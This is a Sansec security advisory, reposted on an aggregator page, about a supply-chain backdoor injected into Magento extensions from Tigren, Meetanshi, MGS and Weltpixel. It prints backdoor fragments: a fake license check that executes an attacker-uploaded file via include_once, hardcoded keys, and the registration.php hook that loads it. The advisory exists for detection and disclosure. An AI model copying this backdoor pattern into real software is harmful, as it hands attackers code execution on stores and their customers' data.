惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

J
Java Code Geeks
腾讯CDC
M
MIT News - Artificial intelligence
Y
Y Combinator Blog
L
LangChain Blog
Vercel News
Vercel News
云风的 BLOG
云风的 BLOG
GbyAI
GbyAI
Stack Overflow Blog
Stack Overflow Blog
Microsoft Azure Blog
Microsoft Azure Blog
B
Blog RSS Feed
The GitHub Blog
The GitHub Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
B
Blog
P
Proofpoint News Feed
H
Hackread – Cybersecurity News, Data Breaches, AI and More
博客园_首页
Google DeepMind News
Google DeepMind News
WordPress大学
WordPress大学
aimingoo的专栏
aimingoo的专栏
小众软件
小众软件
IT之家
IT之家
A
About on SuperTechFans
H
Help Net Security

Sansec - experts in eCommerce security

GorgonAgora: 4,800+ fake storefronts skim cards across hundreds of impersonated brands Sansec adds support for Sylius 1 & 2 Critical vulnerability in Mirasvit Cache Warmer for Magento Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts Composer vulnerability leaks GitHub tokens, threatens PHP supply chain Over 200 PrestaShop stores expose installer, allowing full takeover ClickFix malware hits DoD cybersecurity vendor homepage SVG Onload Tag Hides Magecart Skimmer on 99 Stores Mass PolyShell attack wave hits 471 stores in one hour Novel WebRTC skimmer bypasses security controls at $100+ billion car maker PolyShell: unrestricted file upload in Magento and Adobe Commerce Digital skimmer hits global supermarket chain Building a faster YARA engine in pure Go Magento Developers Impersonated in Targeted GitHub Malware Operation Claude finds 353 zero-days on Packagist The billion-dollar security.txt problem Keylogger targets 200,000+ employees at major US bank ConnectPOS leaked Github secrets for years Critical backdoor found in MGT Varnish extension SessionReaper attacks have started, 3 in 5 stores still vulnerable SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236) Adobe patches critical Magento admin takeover via menu injection Found defunct.dat on your site? You've got a problem. You have 2 weeks left to set up CSP for your store Merchants left guessing at last-minute PCI-DSS u-turn Magento Security Release APSB25-08 [Impact Analysis] Sorry, client-side security does not work Google services abused in skimming campaigns Thousands of Adobe Commerce stores hacked in competing CosmicSting campaigns CosmicSting attack & defense overview
Backdoor found in popular ecommerce components
Sansec Forensics Team · 2025-05-01 · via Sansec - experts in eCommerce security

Hundreds of stores, including a $40 billion multinational, are running backdoored versions of popular ecommerce software. We found that the backdoor is actively used since at least April 20th. Sansec identified these backdoors in the following packages which were published between 2019 and 2022.

VendorPackage
TigrenAjaxsuite
TigrenAjaxcart
TigrenAjaxlogin
TigrenAjaxcompare
TigrenAjaxwishlist
TigrenMultiCOD
MeetanshiImageClean
MeetanshiCookieNotice
MeetanshiFlatshipping
MeetanshiFacebookChat
MeetanshiCurrencySwitcher
MeetanshiDeferJS
MeetanshiOutofstockNotifier
MGSLookbook
MGSStoreLocator
MGSBrand
MGSGDPR
MGSPortfolio
MGSPopup
MGSDeliveryTime
MGSProductTabs
MGSBlog

We established that Tigren, Magesolution (MGS) and Meetanshi servers have been breached and that attackers were able to inject backdoors on their download servers.

This hack is called a Supply Chain Attack, which is one of the worst types. By hacking these vendors, the attacker gained access to all of their customers' stores. And by proxy, to all of the customers that visit these stores.

We also found a backdoored version of the Weltpixel GoogleTagManager extension, but we have not been able to establish whether Weltpixel or these particular stores got compromised.

Check your store now

If you use software from these vendors, you should check your store now. The backdoor consists of a fake license check in a file called License.php or LicenseApi.php.

The evil is in the adminLoadLicense function, which executes $licenseFile as PHP.

protected function adminLoadLicense($licenseFile)
{
    // ...
    $data = include_once($licenseFile);
    // ...
}

The $licenseFile can be controlled by the attacker using the adminUploadLicense function. In versions from 2019 this does not require any authentication. In later versions this requires a secret key that must match the hardcoded checksum and salt:

class License {

    const SECURE_KEY = '83ba291cd9201e9a28173741bac82745';
    const SIGN_KEY   = 'afa3a778bd34181c44f2dfe1de8aff05';

The fake license check is explicitly activated via registration.php.

<?php
\Magento\Framework\Component\ComponentRegistrar::register(
    \Magento\Framework\Component\ComponentRegistrar::MODULE,
    'Meetanshi_CookieNotice',
    __DIR__
);
if (file_exists(__DIR__ . DIRECTORY_SEPARATOR . 'Model/System/Config/Source/Box/License/License.php')) {
    include_once(__DIR__ . DIRECTORY_SEPARATOR . 'Model/System/Config/Source/Box/License/License.php');
}

The backdoor code is the same for all found packages, except for:

  • The authorization checksum (unique per vendor)
  • The backdoor path (unique per module)
  • The license filename (unique per vendor)
VendorMeetanshiMGSTigrenWeltpixel
Secure Key05aafe4...83ba291...e7c057dd...47946a7...
Sign Keyf31d647...afa3a77...313bedf...52dd8df...
License Filenamemtn-licensemgs-licenseapj-licensewlp-license

Recommendations

Sansec’s eComscan detects this malware out of the box. If you find a backdoor on your store, you can safely remove the fake License file. If you still have the original source in a zip file (particularly WeltPixel), please share it with us for further analysis.

At this point, we recommend to be extremely cautious when using software from these vendors.

Vendor responses

Magesolution (MGS) did not respond, but the backdoored packages can still be downloaded from their site as of Apr 30th.

Tigren denies to have been hacked, but the backdoored packages are still available on their site as of Apr 30th.

Meetanshi claims that their software has not been tampered with, but confirmed that their server got hacked.

Further research

It is rare that a backdoor remains undetected for 6 years, but is even stranger that actual abuse has only started now.

We will update this post when we learn more.

Need help or want a second opinion? Get in touch.

Credits

Special thanks to Alexandra Zota for discovering the initial abuse.

Read more